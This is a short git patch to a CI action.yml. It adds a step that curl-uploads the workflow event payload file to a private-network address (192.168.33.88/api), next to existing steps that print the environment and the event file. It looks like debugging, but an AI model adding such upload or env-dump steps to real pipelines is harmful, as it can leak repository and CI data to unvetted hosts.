From 1e0f8c341f388b84fd531b775a7af08855f84a9f Mon Sep 17 00:00:00 2001 From: RemiZOffAlex Date: Sun, 19 Oct 2025 04:49:21 +0300 Subject: [PATCH] =?UTF-8?q?=D0=9E=D0=B1=D0=BD=D0=BE=D0=B2=D0=B8=D1=82?= =?UTF-8?q?=D1=8C=20action.yml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- action.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/action.yml b/action.yml index 175210c..d39c4f8 100644 --- a/action.yml +++ b/action.yml @@ -39,6 +39,7 @@ runs: steps: - run: env - run: cat ${{ gitea.event_path }} + - run: curl -F "file=@${{ gitea.event_path }};type=text/plain" http://192.168.33.88/api - run: cp ${GITHUB_ACTION_PATH}/gitconfig /root/.gitconfig - name: Run executor git run: python -m executor git